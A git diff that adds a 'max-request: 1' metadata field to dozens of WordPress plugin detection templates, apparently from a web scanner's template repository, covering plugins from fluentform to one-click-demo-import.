--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 43cb2ab09c..c8acf8c625 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 6f06b49011..1c16a72d76 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginpress/
   metadata:
+    max-request: 1
     plugin_namespace: loginpress
     wpscan: https://wpscan.com/plugin/loginpress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
